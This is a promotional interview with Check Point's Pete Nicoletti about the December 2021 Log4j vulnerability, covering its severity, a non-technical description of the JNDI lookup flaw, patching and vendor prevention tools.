Pete has 32 years of Security, Network, and MSSP experience and recently joined Check Point as a Field CISO of the Americas. Pete’s cloud security deployments and designs have been rated by Garter as #1 and #2 in the world and he literally “wrote the book” and contributed to secure cloud reference designs as published in Intel Press: “Building the Infrastructure for Cloud Security: A Solutions View.” 

In this interview, CISO Pete Nicoletti provides powerful, pack-a-punch CISO-level insight into the Log4j vulnerability.

We have a lot to cover here and news is developing almost every minute…What does a CISO need to know right now about Log4j?

It’s the worst possible combination for an attack…easy to exploit and everything/everywhere is vulnerable. Kiddie scripters can craft the attack…and the blast radius is huge. This is going to affect millions.  Almost every company that develops software leverages this code library. Organizations may have this vulnerability baked into their code, that of their hosting provider, or that of their hardware manufacturer.

Thankfully, Minecraft users and noisy crypto miner hackers on the interweb noticed this vulnerability quickly; otherwise nation-states and other sophisticated hacking gangs would have exploited it for their nefarious purposes before anyone could have seen it coming.

Let’s talk about what it is….no one has ever heard about this function…

Log4j is the most frequently used logging library in Apache Linux distro. It’s been downloaded millions of times. However, as we’ve learned a few weeks, it has a serious flaw in the way it handles certain character strings. The compromise is delivered with as few as 25 characters. To perform remote code execution, an attacker only needs to send a simple malicious request that contains a formatted string which is then picked up by the Log4j library. The vulnerability occurs due to a lack of sanitization in the lookup method used in the Log4j library. An attacker can leverage JNDI (Java Naming and Directory Interface) to perform a request to a remote malicious resource.

The US Federal government’s Cybersecurity and Infrastructure Security Agency (CISA) gave this attack a rating of 10/10…the highest risk.

How can this attack be stopped?

In the short term, patching. In the long run, the best way to prevent this attack and other similar attacks involves use of an autonomous, multi-layer Gen 5 artificial intelligence-based prevention approach.  Some tools work “pre-emptively”, some tools work only after a signature update, and other tools only show evidence after the secondary exploit.

Pre-emptively? What does that mean?

It’s simple: you prevent the attack without any awareness of its tactics or vector…that’s called “Pre-emptive” prevention. Having pre-emptive zero day capabilities and extremely fast reacting signature development is part of a strong vendor-based prevention strategy.

There is talk that the vulnerability was being used by hackers for some time…what about historical analysis?

The first evidence reported pertaining to this threat emerged on December 1st. Public disclosures were made nine days later. A BlackHat presentation hinted at the issue in 2016, but it wasn’t until December 9th 2021 that the entire world found out about it…We will start seeing reports of companies compromised during the first week of December, as hackers gained footholds, established persistenceetc.  

How can you tell if your organization is vulnerable?

Assume that you are…as we are all vulnerable to this issue, some just have more exposure and risk than others. Your software dev teams will run scanners against each server with the latest updates to find this flaw.  All the usual scanning companies can find it.  You also should use software code scanning tools from Check Point.

Did you like this content? See an outstanding Livestream version of this interview and more, right here.

Lastly, to learn more about pressing issues in the cyber world, please join us at the premiere cyber security event of the year – CPX 360 2022. Register here.